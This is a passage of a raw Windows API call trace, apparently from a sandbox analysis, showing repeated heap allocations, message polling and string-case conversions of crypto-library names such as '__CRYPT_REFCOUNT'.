wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0036.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0036.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0036.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0036.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0036.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.736] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0036.736] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0036.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.736] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.737] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.737] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0036.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0036.737] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.737] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.737] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.737] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.738] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.738] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.738] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0036.738] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2340 [0036.738] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.738] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0036.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0036.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.738] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.739] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0036.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0036.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0036.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0036.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0036.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0036.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x42400) returned 0x9d9828 [0036.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x9d9828 | out: hHeap=0x770000) returned 1 [0036.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0036.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0036.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0036.744] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0036.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.745] HeapFree (in: 